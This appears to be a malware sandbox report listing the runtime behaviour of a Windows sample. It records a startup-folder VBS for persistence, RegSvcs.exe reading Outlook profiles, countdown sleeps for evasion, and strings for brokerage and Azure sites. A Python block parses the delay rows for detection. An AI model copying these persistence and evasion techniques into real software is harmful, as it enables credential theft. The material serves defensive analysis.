                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 6BRa130JDj.exe | Static file information: File size 1055744 > 1048576
                Source: 6BRa130JDj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 6BRa130JDj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 6BRa130JDj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 6BRa130JDj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 6BRa130JDj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 6BRa130JDj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: wntdll.pdbUGP source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
                Source: 6BRa130JDj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 6BRa130JDj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 6BRa130JDj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 6BRa130JDj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 6BRa130JDj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B4B37 LoadLibraryA,GetProcAddress,0_2_002B4B37
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002D8945 push ecx; ret 0_2_002D8958
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00048945 push ecx; ret 2_2_00048958
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01899C30 push esp; retf 018Bh 7_2_01899D55
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | File created: C:\Users\user\AppData\Local\Allene\ectosphere.exe

                Boot Survival

                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002B48D7
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00335376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00335376
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_000248D7
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_000A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_000A5376
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002D3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D3187
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | API/Special instruction interceptor: Address: F6E224
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | API/Special instruction interceptor: Address: 1B4179C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay times: 922337203685477, 600000, 599875, 599765, 599656, 599537, 599406, 599297, 599187, 599078, 598969, 598859, 598750, 598640, 598531, 598419, 598305, 598139, 597919, 597812, 597703, 597593, 597484, 597373, 597265, 597156, 597047, 596937, 596828, 596718, 596609, 596499, 596390, 596279, 596172, 596062, 595953, 595844, 595734, 595621, 595453, 595317, 595187, 595078, 594969, 594844, 594734, 594625, 594515, 594406, 594296
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay times: 922337203685477, 600000, 599890, 599781, 599671, 599562, 599453, 599343, 599233, 599102, 598992, 598859, 598733, 598497, 598390, 598281, 598171, 598062, 597953, 597841, 597734, 597625, 597515, 597406, 597296, 597187, 597078, 596968, 596859, 596750, 596640, 596531, 596421, 596312, 596147, 596044, 595915, 595796, 595687, 595578, 595468, 595359, 595250, 595140, 595031, 594921, 594812, 594703, 594593, 594484, 594375, 594264, 594154, 594046
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1713
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1708
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8131
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-102644)
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | API coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | API coverage: 4.9 %
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031445A GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031C6D1 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_003137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00313B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008C6D1 FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595317Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599102Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598992Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598733Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598497Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597841Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596147Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596044Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595915Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594154Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594046Jump to behavior
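The two runs of delays above start at roughly 600000 ms and shrink by about 110 ms per call, and one call asks for 922337203685477 ms. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it parses rows of this shape and reduces them to the figures an analyst wants (how many long sleeps, their total, whether the values form a countdown, whether an effectively infinite wait appears). The row grammar in `ROW_RE` is inferred from the report text, the 60 s threshold and the countdown heuristic are the example's own choices, and reading 922337203685477 ms as an infinite wait (the value equals TimeSpan.MaxValue in whole milliseconds) is an interpretation, not something the report states. The sample rows are constructed from values on this page.

```python
"""Summarise sleep-based evasion from sandbox 'Thread delayed' rows.

Added example, not code from the Joe Sandbox report. Assumptions (labelled):
the row grammar in ROW_RE is inferred from the report's text; the 60 s
threshold and the countdown heuristic are this example's own choices; reading
922337203685477 ms as an effectively infinite wait (it equals TimeSpan.MaxValue
in whole milliseconds) is an interpretation, not something the report states.
"""
from __future__ import annotations

import re
from typing import Iterable

# A report row reads "Source: <path> Thread delayed: delay time: <ms>", often
# with the separators and a trailing "Jump to behavior" link text run together.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Thread delayed:\s*delay time:\s*(?P<ms>\d+)"
)

LONG_SLEEP_MS = 60_000                 # a single wait of a minute or more (assumed threshold)
TIMESPAN_MAX_MS = 922_337_203_685_477  # Int64.MaxValue ticks / 10_000 ticks per ms

# Constructed sample: four rows copied from the report, one garbled row with the
# link text still attached, and one unrelated row that must be ignored.
SAMPLE_ROWS = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599890",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599671",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard",
]


def parse_delays(rows: Iterable[str]) -> list[tuple[str, int]]:
    """Return (source_path, delay_ms) for every row that is a thread delay."""
    found = []
    for row in rows:
        m = ROW_RE.search(row)
        if m:
            found.append((m.group("src"), int(m.group("ms"))))
    return found


def is_countdown(delays: list[int], max_step_ms: int = 1_000) -> bool:
    """Heuristic: strictly decreasing values in small steps look like a loop that
    re-arms a wait for the time *remaining*, which is how a long sleep survives
    a sandbox that shortens individual sleeps."""
    if len(delays) < 3:
        return False
    steps = [a - b for a, b in zip(delays, delays[1:])]
    return all(0 < s <= max_step_ms for s in steps)


def summarize(rows: Iterable[str]) -> dict:
    """Aggregate the delay rows into the numbers an analyst wants at a glance."""
    parsed = parse_delays(rows)
    all_ms = [ms for _, ms in parsed]
    finite = [ms for ms in all_ms if ms < TIMESPAN_MAX_MS]
    infinite_seen = any(ms >= TIMESPAN_MAX_MS for ms in all_ms)
    long_sleeps = sum(1 for ms in finite if ms >= LONG_SLEEP_MS)
    return {
        "delay_count": len(all_ms),
        "sources": sorted({src for src, _ in parsed}),
        "long_sleeps": long_sleeps,
        "total_finite_seconds": round(sum(finite) / 1000, 1),
        "infinite_wait_seen": infinite_seen,
        "countdown_loop": is_countdown(finite),
        "likely_sleep_evasion": long_sleeps > 0 or infinite_seen,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

Run against the full list above, the same code reports two countdown runs of about ten minutes each; the point of the countdown check is that a sandbox which shortens each Sleep call individually does not defeat a loop that keeps re-arming for the remaining time, so the total requested delay, not the per-call value, is what to budget analysis time against.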
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd326de7d68210<
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
